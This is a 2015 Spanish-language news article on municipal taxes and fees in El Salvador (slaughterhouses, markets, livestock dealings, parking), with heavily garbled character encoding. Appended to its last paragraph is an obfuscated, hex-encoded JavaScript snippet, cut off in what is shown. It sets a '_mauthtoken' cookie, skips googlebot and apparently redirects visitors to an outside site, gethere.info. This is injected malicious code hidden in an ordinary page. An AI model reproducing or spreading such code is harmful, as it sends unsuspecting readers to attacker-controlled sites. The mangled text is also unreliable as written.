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2 Sep 2015
Noticias | Por: Redacción

Tasas e impuestos municipales que quizA? desconocAi??as

El impuesto de vialidad, el FEFE y tasas tributarias especiales para rastros, cementerios o estacionamientos, son algunos de los ingresos mA?s raros que pueden registrar las municipalidades.

Aunque El Salvador es un paAi??s geogrA?ficamente pequeAi??o, posee 14 departamentos con un total de 262 municipios, los cuales por ley gozan de autonomAi??a en lo econA?mico y social para poder operar. Cada municipalidad estA? facultada para legislar sobre impuestos y tasas municipales, pese a que es la Asamblea Legislativa la que al final debe aprobar leyes o cA?digos. Sin embargo, cada localidad propone sus normas segA?n sus necesidades. El impuesto de vialidad, el FEFE y tasas tributarias especiales para rastros, cementerios o estacionamientos, son algunos de los ingresos mA?s raros que pueden registrar las municipalidades.

En concreto los municipios cuentan con su propio territorio, poblaciA?n y gobierno local y tienen como marco legal las disposiciones establecidas en la ConstituciA?n de la RepA?blica y el CA?digo Municipal, principalmente. Pero tambiAi??n les amparan las Ley General Tributaria Municipal y Ordenanzas Especiales, las cuales rigen los hechos sujetos a impuestos, las tarifas y las personas y empresas que deben pagarlas, asAi?? como las tasas que deben pagarse por determinados servicios.

(Los impuestos que recoge el Gobierno van a parar acA?)

De acuerdo con el artAi??culo 130 de la Ley General Tributaria Municipal, las alcaldAi??as pueden tasar los servicios pA?blicos como ai???el alumbrado pA?blico, aseo, ornato, baAi??os y lavaderos pA?blicos, casas comunales municipales, cementerios, dormitorios pA?blicos, mercados, establecimientos en plazas y sitios pA?blicos, pavimentaciA?n de vAi??as pA?blicas, rastro municipal, tiangues, estadios y piscinas municipales y otros servicios que las condiciones de cada Municipio le permitan proporcionar al pA?blico o que representen uso de bienes municipalesai???. Para la fijaciA?n de las tarifas por tasas, los municipios deberA?n tomar en cuenta los costos de suministro del servicio, el beneficio que presta a los usuarios y la realidad socio-econA?mica de la poblaciA?n, recalca dicha ley.infomunicipalidad

De losAi?? servicios a los inmuebles

Para fijar las tasas aplicables por los servicios pA?blicos municipales que se presten a la propiedad inmobiliaria, deberA?n considerarse, entre otros criterios, si es de naturaleza urbana o rural, asAi?? como la zona en que se encuentra ubicado el inmueble; si estA? destinada para casa de habitaciA?n o para la industria, comercio o servicios; si estA? sometida o no al rAi??gimen de la propiedad inmobiliaria por pisos y apartamentos o si es o no predio baldAi??o.

(Las alcaldAi??as pueden cobrar impuestos)

Los mercados

Las tarifas correspondientes a las tasas por locales y puestos de venta, asAi?? como por otros servicios que presten los mercados municipales, deberA?n fundamentarse en aspectos como la ubicaciA?n y tamaAi??o de los puestos locales, la comodidad y facilidades que ofrezcan, la naturaleza de las ventas, el volumen y demanda de los productos comercializados.

Sobre los rastros

Dentro de las tasas por los servicios que prestan los rastros municipales estA?n comprendidas las actividades de revisiA?n de ganado mayor y menor destinado al sacrificio, inspecciA?n veterinaria posterior al sacrificio, matanza y destace de ganado mayor y menor, servicio de refrigeraciA?n de carne, servicio de corral y otros. TambiAi??n estA?n afectos los servicios de similar naturaleza que el municipio preste a los rastros privados.

De las transacciones de ganado

En este caso, las municipalidades pueden establecer tasas por el otorgamiento de matrAi??cula de fierro y marcas de herrar, de comerciantes, correteros, destazadores y matarifes de ganado mayor y menor. Pero tambiAi??n se pueden tasar la legalizaciA?n u otorgamiento del Visto Bueno por transacciones de ganado, por el poste de ganado, la expediciA?n de guAi??as para traslado de semovientes, las autAi??nticas de firmas en los documentos que amparen cartas poderes, las de revocatorias de las mismas y otras relacionadas con estas transacciones.

TambiAi??n estA?n los estacionamientos

Finalmente, los municipios determinarA?n las tasas y la forma de percibirlas que deberA?n pagarse por el uso de zonas de estacionamiento de vehAi??culos automotores en calles, plazas, avenidas y demA?s sitios pA?blicos establecidos o autorizados por ellos dentro de su comprensiA?n.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== 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